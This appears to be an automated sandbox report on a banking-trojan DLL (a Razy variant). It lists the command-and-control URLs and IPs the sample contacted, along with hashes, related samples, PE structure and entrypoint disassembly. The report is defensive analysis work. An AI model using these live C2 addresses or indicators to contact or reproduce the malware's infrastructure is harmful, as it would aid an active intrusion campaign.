https://192.46.210.220/Certification	loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000002.809813780.00000000009CA000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://192.46.210.220/6g	loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96/	loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://143.244.140.214:808/#	loaddll32.exe, 00000001.00000003.460682541.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://143.244.140.214:808/%	loaddll32.exe, 00000001.00000003.547706915.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/4ad=	loaddll32.exe, 00000001.00000003.607089301.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://143.244.140.214:808/l9%	loaddll32.exe, 00000001.00000003.661087742.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47/#	rundll32.exe, 00000008.00000002.811696720.0000000004B46000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/r	loaddll32.exe, 00000001.00000003.590323971.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://143.244.140.214:808/ad=	loaddll32.exe, 00000001.00000002.809608295.0000000000F79000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/Wfv	loaddll32.exe, 00000001.00000003.624452537.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/#g	loaddll32.exe, 00000001.00000003.471609876.0000000000F43000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/h	rundll32.exe, 00000008.00000003.437131039.00000000009DA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/l	loaddll32.exe, 00000001.00000003.652716297.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://143.244.140.214:808/ll	loaddll32.exe, 00000001.00000002.808902264.0000000000ECB000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/4ti	loaddll32.exe, 00000001.00000003.590323971.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://143.244.140.214:808/zyJ	loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://182.46.210.220/	loaddll32.exe, 00000001.00000003.735007316.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/%	loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/soft	loaddll32.exe, 00000001.00000003.440681049.0000000000F42000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://192.46.210.220/1	rundll32.exe, 00000008.00000002.811696720.0000000004B46000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://143.244.140.214:808/la	loaddll32.exe, 00000001.00000003.624452537.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/ll	loaddll32.exe, 00000001.00000003.786947013.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/nd.	loaddll32.exe, 00000001.00000003.607089301.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://143.244.140.214/	loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://143.244.140.214:808/My	loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://185.56.219.47/	loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.440681049.0000000000F42000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000002.811696720.0000000004B46000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://192.46.210.220/(g	loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/D	loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/L	loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/E	loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/f	loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/V	rundll32.exe, 00000008.00000003.758506081.0000000004B55000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/e	loaddll32.exe, 00000001.00000003.440681049.0000000000F42000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://143.244.140.214:808/b	rundll32.exe, 00000008.00000002.809865827.00000000009DA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://143.244.140.214:808/ll9%	loaddll32.exe, 00000001.00000003.547706915.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/graphy	rundll32.exe, 00000008.00000003.758506081.0000000004B55000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://143.244.140.214:808/	loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://45.77.0.96:6891/	loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.443284456.0000000004B53000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://143.244.140.214/f	loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/Bd	loaddll32.exe, 00000001.00000003.735007316.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/0	loaddll32.exe, 00000001.00000003.776868957.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/V	rundll32.exe, 00000008.00000003.733323810.0000000004B54000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/aenh.dllU	loaddll32.exe, 00000001.00000003.786947013.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/_	loaddll32.exe, 00000001.00000003.452271228.0000000000F43000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/Vdv	loaddll32.exe, 00000001.00000003.735007316.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/l	loaddll32.exe, 00000001.00000003.496375711.0000000000F00000.00000004.00000001.sdmp	false		unknown
https://192.46.210.220/ography	loaddll32.exe, 00000001.00000003.496375711.0000000000F00000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.758506081.0000000004B55000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.754463797.0000000004B53000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://192.46.210.220/aenh.dllltb	loaddll32.exe, 00000001.00000003.616066058.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://193.244.140.214:808/	loaddll32.exe, 00000001.00000002.809608295.0000000000F79000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://143.244.140.214:808/~	loaddll32.exe, 00000001.00000003.488039771.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/1g	loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/Microsoft	rundll32.exe, 00000008.00000003.733323810.0000000004B54000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://192.46.210.220//)	loaddll32.exe, 00000001.00000003.616066058.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://45.77.0.96:6891/:	rundll32.exe, 00000008.00000003.758506081.0000000004B55000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://185.56.219.47:8116/H	rundll32.exe, 00000008.00000002.809865827.00000000009DA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://192.46.210.220/Nf	loaddll32.exe, 00000001.00000003.751870423.0000000000F3F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
45.77.0.96	unknown	United States	20473	AS-CHOOPAUS	true
185.56.219.47	unknown	Italy	202675	KELIWEBIT	true
192.46.210.220	unknown	United States	5501	FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGe	true
143.244.140.214	unknown	United States	174	COGENT-174US	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	510707
Start date:	28.10.2021
Start time:	05:21:41
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Variant.Razy.980776.18296.11433 (renamed file extension from 11433 to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.bank.troj.evad.winDLL@11/1@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 14.2% (good quality ratio 14.2%) Quality average: 79.4% Quality standard deviation: 15.5%
HCA Information:	Successful, ratio: 64% Number of executed functions: 21 Number of non-executed functions: 83
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 209.197.3.8, 20.82.210.154, 80.67.82.211, 80.67.82.235, 20.54.110.249, 40.112.88.60 Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:26:13	API Interceptor	165x Sleep call for process: rundll32.exe modified
05:26:15	API Interceptor	165x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
45.77.0.96	SecuriteInfo.com.Variant.Razy.980776.20571.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.28629.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.27292.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.5198.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.31180.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.8232.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.23616.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.19527.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.5008.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.19803.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.31954.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.10558.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.8232.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.30568.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.9478.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.28061.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.25006.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.28328.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.4470.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.14159.dll	Get hash	malicious	Browse
185.56.219.47	SecuriteInfo.com.Variant.Razy.980776.20571.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.28629.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.27292.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.5198.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.31180.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.8232.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.23616.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.19527.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.5008.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.19803.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.31954.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.10558.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.8232.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.30568.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.9478.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.28061.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.25006.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.28328.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.4470.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Razy.980776.14159.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
KELIWEBIT	SecuriteInfo.com.Variant.Razy.980776.20571.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.28629.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.27292.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.5198.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.31180.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.8232.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.23616.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.19527.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.5008.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.19803.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.31954.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.10558.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.8232.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.30568.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.9478.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.28061.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.25006.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.28328.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.4470.dll	Get hash	malicious	Browse	185.56.219.47
	SecuriteInfo.com.Variant.Razy.980776.14159.dll	Get hash	malicious	Browse	185.56.219.47
AS-CHOOPAUS	SecuriteInfo.com.Variant.Razy.980776.20571.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.28629.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.27292.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.5198.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.31180.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.8232.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.23616.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.19527.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.5008.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.19803.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.31954.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.10558.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.8232.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.30568.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.9478.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.28061.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.25006.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.28328.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.4470.dll	Get hash	malicious	Browse	45.77.0.96
	SecuriteInfo.com.Variant.Razy.980776.14159.dll	Get hash	malicious	Browse	45.77.0.96

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
51c64c77e60f3980eea90869b68c58a8	SecuriteInfo.com.Variant.Razy.980776.20571.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.28629.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.27292.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.5198.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.31180.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.8232.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.23616.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.19527.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.5008.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.19803.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.31954.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.10558.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.8232.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.30568.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.9478.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.28061.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.25006.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.28328.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.4470.dll	Get hash	malicious	Browse	192.46.210.220
	SecuriteInfo.com.Variant.Razy.980776.14159.dll	Get hash	malicious	Browse	192.46.210.220

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	modified
Size (bytes):	326
Entropy (8bit):	3.400705200144537
Encrypted:	false
SSDEEP:	6:kKH8EMl/s8gFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:/W/Y2kPlE99SNxAhUefit
MD5:	4B10DC4223F2840BE804E4085B3FB1E6
SHA1:	5A4473CF78825131CE2890A427C861EC51EEFEB7
SHA-256:	0ED3755AAC3E36FF1DCBAF93D68A4C8EBA8AA8AB9CC04809A5989432F24F0B44
SHA-512:	8D61442743AAA78D3A87D671550261BC6B1D74B147B3D6697273A108305B4113F1368B82D65105EA6F4BAB9A216AC592032B292A3E9338012A2EAFFFF4DB4C5E
Malicious:	false
Reputation:	low
Preview:	p...... .........d....(...............................................5....... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.439708939304409
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Variant.Razy.980776.18296.dll
File size:	1375232
MD5:	f9089433cce6fd7f480d5e7335190ef5
SHA1:	0ca2bb79d7b1646f56a18ff24fa0014952455597
SHA256:	7ee50b399b3fde0db3369c94b06e341db931748740da0c96ba4a14db3fbe50ef
SHA512:	1ece9eac1e2fc0595ac4a023ad1deffc4bfc5e08ecaad3812e97e7170d7d623d72cb63bd874785837b29248804ebe3d0010766d288e5550659506c51b51b8d77
SSDEEP:	24576:snxqsL+DvNdnhMr5Lo6dOGcuQNrSH9d6N9eYWtZgDxxxSPnsqz7puATt5csRbu7x:scfk82uAJTI7FPswKwua
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7:..s[..s[..s[....?.w[..z#_.h[..!3..w[..!3..h[..!3..i[..!3.._[....;.f[..s[..-Z..!3...[..!3..r[..!34.r[..!3..r[..Richs[.........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x4336b0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5BBD936D [Wed Oct 10 05:51:41 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	ccbe70d6d0d02f6248ca160d6a0bb85b

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F4178A15AF7h
call 00007F4178A16827h
mov eax, dword ptr [ebp+10h]
push eax
mov ecx, dword ptr [ebp+0Ch]
push ecx
mov edx, dword ptr [ebp+08h]
push edx
call 00007F4178A158E6h
add esp, 0Ch
pop ebp
retn 000Ch
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [0054806Ch]
xor edx, edx
mov ecx, 00000020h
div ecx
push edx
mov edx, dword ptr [ebp+08h]
xor edx, dword ptr [0054806Ch]
push edx
call 00007F4178A15B34h
add esp, 08h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [0054806Ch]
xor edx, edx
mov ecx, 00000020h
div ecx
mov eax, 00000020h
sub eax, edx
push eax
mov ecx, dword ptr [ebp+08h]
push ecx
call 00007F4178A15B03h
add esp, 08h
xor eax, dword ptr [0054806Ch]
pop ebp
ret
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+0Ch]
ror eax, cl
pop ebp
ret
int3
int3
int3
push ebp
mov ebp, esp
call 00007F4178A16E8Dh
push eax
call 00007F4178A57B97h
add esp, 04h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword ptr [ebp+00h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x147190	0x6c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1471fc	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x15c000	0x72b4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x143110	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x143168	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc7000	0x184	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xc5e2f	0xc6000	False	0.442065922901	data	6.47812359725	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xc7000	0x80aec	0x80c00	False	0.534103837985	data	5.52052896221	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x148000	0x13ba0	0x1800	False	0.1875	DOS executable (block device driverpyright)	3.99635070896	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x15c000	0x72b4	0x7400	False	0.710264008621	data	6.69742088731	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

KERNEL32.dll

